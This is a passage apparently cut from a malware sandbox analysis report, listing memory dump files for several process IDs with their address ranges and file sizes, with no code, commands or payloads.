      • memory/2192-255-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2192-258-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2192-269-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2192-268-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2192-267-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2192-265-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2192-264-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2192-263-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2192-262-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2192-261-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2192-260-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2192-253-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2192-251-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

        Filesize

        4KB

      • memory/2192-242-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2192-243-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2192-244-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2192-245-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2192-246-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2192-247-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2192-248-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2192-249-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2480-259-0x0000000073780000-0x0000000073D2B000-memory.dmp

        Filesize

        5.7MB

      • memory/2480-240-0x0000000073780000-0x0000000073D2B000-memory.dmp

        Filesize

        5.7MB

      • memory/2480-155-0x0000000002940000-0x0000000002980000-memory.dmp

        Filesize

        256KB

      • memory/2480-154-0x0000000073780000-0x0000000073D2B000-memory.dmp

        Filesize

        5.7MB

      • memory/2480-153-0x0000000073780000-0x0000000073D2B000-memory.dmp

        Filesize

        5.7MB

      • memory/2544-111-0x000000005FFF0000-0x0000000060000000-memory.dmp

        Filesize

        64KB

      • memory/2544-81-0x0000000071D8D000-0x0000000071D98000-memory.dmp

        Filesize

        44KB

      • memory/2544-113-0x0000000071D8D000-0x0000000071D98000-memory.dmp

        Filesize

        44KB

      • memory/2544-11-0x000000002F941000-0x000000002F942000-memory.dmp

        Filesize

        4KB

      • memory/2544-13-0x0000000071D8D000-0x0000000071D98000-memory.dmp

        Filesize

        44KB

      • memory/2544-15-0x0000000003690000-0x0000000003692000-memory.dmp

        Filesize

        8KB

      • memory/3036-163-0x0000000073780000-0x0000000073D2B000-memory.dmp

        Filesize

        5.7MB

      • memory/3036-256-0x0000000073780000-0x0000000073D2B000-memory.dmp

        Filesize

        5.7MB

      • memory/3036-162-0x0000000073780000-0x0000000073D2B000-memory.dmp

        Filesize

        5.7MB

      • memory/3036-161-0x0000000073780000-0x0000000073D2B000-memory.dmp

        Filesize

        5.7MB